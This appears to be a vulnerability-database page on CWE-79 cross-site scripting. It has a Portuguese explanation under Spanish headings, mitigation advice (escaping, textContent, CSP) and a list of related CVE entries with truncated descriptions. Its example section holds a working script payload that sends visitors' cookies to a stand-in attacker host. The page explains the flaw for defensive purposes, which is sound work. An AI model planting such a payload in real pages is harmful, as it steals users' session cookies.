Fallos del tipo CWE-79

29.274 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-35583MEDIUMA cross-site scripting (XSS) vulnerability in Sourcecodester Laboratory Management System v1.0 allows attackers to execute arbitrary web scrEPSS 0.5%CVE-2024-42834MEDIUMA stored cross-site scripting (XSS) vulnerability in the Create Customer API in Incognito Service Activation Center (SAC) UI v14.11 allows aEPSS 0.5%CVE-2022-20872MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2022-20833MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2022-20834MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2023-33287MEDIUMA stored cross-site scripting (XSS) vulnerability in the Inline Table Editing application before 3.8.0 for Confluence allows attackers to stEPSS 0.5%CVE-2024-53989LOWPossible XSS vulnerability with certain configurations of rails-html-sanitizer 1.6.0EPSS 0.5%CVE-2024-10880MEDIUMJobBoardWP – Job Board Listings and Submissions <= 1.3.0 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2026-11982MEDIUMStored XSS via missing XSS safety check in Admin2 Pages API partial validationEPSS 0.5%CVE-2024-3489MEDIUMExclusive Addons for Elementor <= 2.6.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Expired TitleEPSS 0.5%CVE-2022-20843MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2022-35655MEDIUMPega Platform from 7.3 to 8.7.3 is affected by an XSS issue due to a misconfiguration of a datapage setting.EPSS 0.5%CVE-2022-20835MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2023-41708MEDIUMReferences to the "app loader" functionality could contain redirects to unexpected locations. Attackers could forge app references that bypaEPSS 0.5%CVE-2023-1879MEDIUMCross-site Scripting (XSS) - Stored in thorsten/phpmyfaqEPSS 0.5%CVE-2022-20936MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2023-1616LOWXiaoBingBy TeaCMS Article Title cross site scriptingEPSS 0.5%CVE-2022-20836MEDIUMMultiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticaEPSS 0.5%CVE-2024-32409HIGHAn issue in SEMCMS v.4.8 allows a remote attacker to execute arbitrary code via a crafted script.EPSS 0.5%CVE-2025-2123MEDIUMGeSHi CSS cssgen.php get_var cross site scriptingEPSS 0.5%